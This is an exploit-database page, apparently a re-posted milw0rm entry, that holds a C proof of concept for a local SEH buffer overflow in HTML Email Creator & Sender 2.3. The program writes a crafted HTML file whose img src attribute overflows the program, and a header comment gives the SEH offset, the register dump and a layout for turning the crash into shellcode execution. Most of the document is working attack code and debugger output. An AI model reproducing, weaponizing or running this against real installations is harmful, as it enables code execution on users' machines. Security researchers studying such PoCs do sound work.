
HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)

🗓️ 01 Jul 2014 00:00:00 — Reported by RootType

HTML Email Creator & Sender v2.3 Local Buffer Overflow PoC (SEH)

Code

                                                    /*0day  HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc
    ********************************************************************
    Debugging info
    The SEH handler is overwritten; the offset is 60 bytes into our buffer,
    so a weaponized buffer has to be laid out as follows (note: this PoC itself
    only writes 0x41 filler — it contains no SEH addresses and no shellcode):
    [POINTER TO NEXT SEH]------[SEH HANDLER]----[NOP]------[SHELLCODE]
              |                     |              |            |
            JMP 4 bytes            POP POP RET    50*0x90      calc.exe 
    *********************************************************************
    Code execution is possible.
    CPU Registers
    EAX 00000000
    ECX 00000208
    EDX 00000000
    EBX 00000029
    ESP 0012E224
    EBP 7C8101B1 kernel32.lstrcpynA
    ESI 90909090              <------------------CONTROLLED
    EDI 00001209
    EIP 0042E1C7 HtmlEmai.0042E1C7
    */

    #include <getopt.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <windows.h>
    /* The four bytes of the tag name "HTML", one field per character;
     * Fbuild fills them with 0x48 0x54 0x4D 0x4C and copies the struct
     * into the output as raw bytes. */
    typedef struct Start {
        uint8_t sh; /* 'H' */
        uint8_t st; /* 'T' */
        uint8_t sm; /* 'M' */
        uint8_t sl; /* 'L' */
    } HTML;

    /* The four bytes of the tag name "HEAD", one field per character;
     * Fbuild fills them with 0x48 0x45 0x41 0x44 and emits the struct
     * twice (opening tag and the "<\HEAD>" closing form). */
    typedef struct Middle {
        uint8_t sh; /* 'H' */
        uint8_t se; /* 'E' */
        uint8_t sa; /* 'A' */
        uint8_t sd; /* 'D' */
    } HEAD;
     
    /* The four bytes of the tag name "BODY", one field per character;
     * Fbuild fills them with 0x42 0x4F 0x44 0x59. */
    typedef struct End {
        uint8_t sb; /* 'B' */
        uint8_t so; /* 'O' */
        uint8_t sD; /* 'D' */
        uint8_t sy; /* 'Y' */
    } BODY;
    #define BUFFERSIZE  0x1A0A      /* 6666 bytes: size budget for the generated file (the payload is ~4.7 KB) */
    #define FILESIZE    29A         /* unused; `29A` is not a valid integer literal and would not compile if ever expanded */
    #define SRC         "<img src=" /* unused; Fbuild spells these bytes out in a local array instead */
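    /*
     * Fbuild - write the crash file for HTML Email Creator & Sender 2.3.
     *
     * The generated file is:
     *
     *   <HTML><HEAD><\HEAD><BODY><img src="AAAA...A"><\BODY><\HTML>\0
     *
     * with 4616 'A' (0x41) bytes inside the src attribute.  This is a crash
     * PoC only: the filler overwrites the SEH record described in the header
     * comment, but no handler address or shellcode is placed in the file.
     *
     * fname: path of the file to create (truncated if it already exists).
     *
     * On any I/O failure the error is reported on stderr and the process
     * exits with status -1, as the original did.
     *
     * Fixes versus the original:
     *  - the tag bytes are written as literals instead of being memcpy'd
     *    from malloc'd one-byte-per-char structs with sizeof(pointer),
     *    which over-read the 4-byte structs on 64-bit builds;
     *  - the original emitted one uninitialized heap byte before the
     *    terminating NUL (offset += 2 after a 1-byte write); the NUL now
     *    directly follows the last tag;
     *  - the file is opened in binary mode, closed, and the writes are
     *    checked; nothing is left allocated.
     */
    void Fbuild(const char *fname)
    {
        enum { FILL_LEN = 4616 };   /* number of 0x41 bytes inside src="" */
        static const char prologue[] = "<HTML><HEAD><\\HEAD><BODY><img src=\"";
        static const char epilogue[] = "\"><\\BODY><\\HTML>";
        const size_t pro_len = sizeof prologue - 1;   /* exclude the literal's NUL */
        const size_t epi_len = sizeof epilogue - 1;

        /* binary mode: the payload ends in a raw 0x00 and must not be translated */
        FILE *f = fopen(fname, "wb");
        if (f == NULL) {
            perror(fname);
            exit(-1);
        }

        /* Stream the pieces straight to the file: no scratch buffer, so no
         * offset bookkeeping and nothing to overflow. */
        int ok = fwrite(prologue, 1, pro_len, f) == pro_len;
        for (size_t i = 0; ok && i < FILL_LEN; i++) {
            ok = fputc(0x41, f) != EOF;
        }
        ok = ok && fwrite(epilogue, 1, epi_len, f) == epi_len;
        ok = ok && fputc(0x00, f) != EOF;   /* terminating NUL, as in the original */

        /* fclose flushes; a failure here means the file on disk is incomplete */
        if (fclose(f) != 0) {
            ok = 0;
        }
        if (!ok) {
            fprintf(stderr, "%s: write failed\n", fname);
            exit(-1);
        }
        printf("File Done!\n");
    }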
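     /*
      * Entry point: print the banner, validate the argument count, and hand
      * the output path to Fbuild.
      *
      * Usage: <program> filename.html
      * Exits with -1 when no output file name is given.
      *
      * Changes versus the original: argv[1] is only read after the argc
      * check; the banner names this PoC instead of the unrelated
      * "Embedthis Appweb" text left over from another exploit; and the
      * system("CLS") screen clear is gone — shelling out just to clear the
      * console is needless and Windows-only.
      */
     int main(int argc, char *argv[])
     {
         fputs("::                                         ::\n", stdout);
         fputs("HTML Email Creator & Sender 2.3 Local Buffer Overflow (SEH) PoC\n", stdout);
         fputs("All Credits:fl0 fl0w\n", stdout);
         fputs("::                                         ::\n", stdout);

         if (argc < 2) {
             /* argv[0] may be NULL when argc == 0; never pass NULL to %s */
             printf("Usage is %s filename.html\n", argc > 0 ? argv[0] : "poc");
             exit(-1);
         }

         Fbuild(argv[1]);
         return 0;
     }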

// milw0rm.com [2009-08-18]

                              
